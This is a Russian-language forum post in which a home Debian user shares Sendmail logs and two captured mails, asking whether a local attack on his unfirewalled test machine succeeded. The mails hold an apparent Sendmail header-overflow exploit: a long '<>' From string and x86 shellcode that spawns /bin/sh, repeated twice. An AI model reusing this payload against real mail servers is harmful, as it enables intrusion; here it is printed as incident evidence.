Вот балуюсь дома debian как всегда нету времени на ее настройку.
Поставил sendmail и ядро 2.4.20 так как там нужно фаерволить через
iptables с которым еще не разобрался то и фаервола у меня нету :)
и вот видимо вчера пробовали ломать этот самый sendmail
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: Milter: no active filter
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 220 myhome.net ESMTP Sendmail 8.12.7/8.12.7; Thu, 6 Mar 2003 19:50:46 +0200
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- helo yahoo.com
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 myhome.net Hello localhost [127.0.0.1], pleased to meet you
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- mail from: anonymous@yahoo.com
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 2.1.0 anonymous@yahoo.com... Sender ok
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- rcpt to: lp
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 2.1.5 lp... Recipient ok
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- data
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 354 Enter mail, end with "." on a line by itself
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: from=anonymous@yahoo.com, size=2379, class=0, nrcpts=1, msgid=<200303061750.h26HokXY000450@myhome.net>, proto=SMTP, daemon=MTA, relay=localhost [127.0.0.1]
Mar 6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 2.0.0 h26HokXY000450 Message accepted for delivery
Mar 6 19:50:46 safari sm-mta[450]: h26HokXZ000450: --- 421 4.4.1 myhome.net Lost input channel from localhost [127.0.0.1]
Mar 6 19:50:46 safari sm-mta[450]: h26HokXZ000450: lost input channel from localhost [127.0.0.1] to MTA after data
Mar 7 19:11:10 safari sm-mta[288]: error: safesasl(/etc/sasldb) failed: No such file or directory
Mar 7 19:11:10 safari sm-mta[291]: starting daemon (8.12.7): SMTP+queueing@00:10:00
Mar 7 19:11:10 safari sm-mta[291]: STARTTLS: ServerCertFile missing
Mar 7 19:11:10 safari sm-mta[291]: started as: /usr/sbin/sendmail -Am -L sm-mta -bd -q10m
Mar 7 19:11:10 safari sm-mta[292]: h26HoKXY000439: alias lp => root
Mar 7 19:11:10 safari sm-mta[292]: h26HoKXY000439: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar 7 19:11:10 safari sm-mta[292]: h26HoKXY000439: to=root, delay=23:20:50, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar 7 19:11:10 safari sm-mta[292]: h26HoKXY000439: done; delay=23:20:50, ntries=1
Mar 7 19:11:10 safari sm-mta[292]: h26HoLXY000440: alias lp => root
Mar 7 19:11:10 safari sm-mta[292]: h26HoLXY000440: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar 7 19:11:10 safari sm-mta[292]: h26HoLXY000440: to=root, delay=23:20:49, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar 7 19:11:10 safari sm-mta[292]: h26HoLXY000440: done; delay=23:20:49, ntries=1
Mar 7 19:11:10 safari sm-mta[292]: h26HoMXY000441: alias lp => root
Mar 7 19:11:10 safari sm-mta[292]: h26HoMXY000441: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar 7 19:11:10 safari sm-mta[292]: h26HoMXY000441: to=root, delay=23:20:48, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar 7 19:11:10 safari sm-mta[292]: h26HoMXY000441: done; delay=23:20:48, ntries=1
Mar 7 19:11:10 safari sm-mta[292]: h26HoNXY000442: alias lp => root
Mar 7 19:11:10 safari sm-mta[292]: h26HoNXY000442: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar 7 19:11:10 safari sm-mta[292]: h26HoNXY000442: to=root, delay=23:20:47, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar 7 19:11:10 safari sm-mta[292]: h26HoNXY000442: done; delay=23:20:47, ntries=1
Mar 7 19:11:10 safari sm-mta[292]: h26HoNXY000443: alias lp => root
Mar 7 19:11:10 safari sm-mta[292]: h26HoNXY000443: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar 7 19:11:10 safari sm-mta[292]: h26HoNXY000443: to=root, delay=23:20:46, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
А дальше идет видимо сам эксплоит вот вопрос неможе кто либо сказать мне
был взлом или нет? Собственно мне это не очень и нужно так как система
тестовая но все же интересно разобратся раз уж так случилось :)
From anonymous@yahoo.com Fri Mar 7 19:11:10 2003
Return-Path: <anonymous@yahoo.com>
Received: from yahoo.com (localhost [127.0.0.1])
by myhome.net (8.12.7/8.12.7) with SMTP id h26HoKXY000439
for lp; Thu, 6 Mar 2003 19:50:20 +0200
Date: Thu, 6 Mar 2003 19:50:20 +0200
Message-Id: <200303061750.h26HoKXY000439@myhome.net>
From: "<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
Subject: hello
Status: RO
Content-Length: 2047
Lines: 1
øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøëëèùÿÿÿÍÃ_ÿG1ÀPjjTY°f1ÛCÿ׺ ÿÿþ¹ßÿÿÿ1ÊRºýÿû¨¹ÿÿÿÿ1ÊRT^jVPP^TY°fj[ÿ×V[1ɱ1À°?Iÿ×Aâö1ÀPh//shh/binT[PSTY1Ò°ÿ×øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøø
From anonymous@yahoo.com Fri Mar 7 19:11:10 2003
Return-Path: <anonymous@yahoo.com>
Received: from yahoo.com (localhost [127.0.0.1])
by myhome.net (8.12.7/8.12.7) with SMTP id h26HoLXY000440
for lp; Thu, 6 Mar 2003 19:50:21 +0200
Date: Thu, 6 Mar 2003 19:50:21 +0200
Message-Id: <200303061750.h26HoLXY000440@myhome.net>
From: "<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
Subject: hello
Status: RO
Content-Length: 2047
Lines: 1
øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøëëèùÿÿÿÍÃ_ÿG1ÀPjjTY°f1ÛCÿ׺ ÿÿþ¹ßÿÿÿ1ÊRºýÿû¨¹ÿÿÿÿ1ÊRT^jVPP^TY°fj[ÿ×V[1ɱ1À°?Iÿ×Aâö1ÀPh//shh/binT[PSTY1Ò°ÿ×øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøø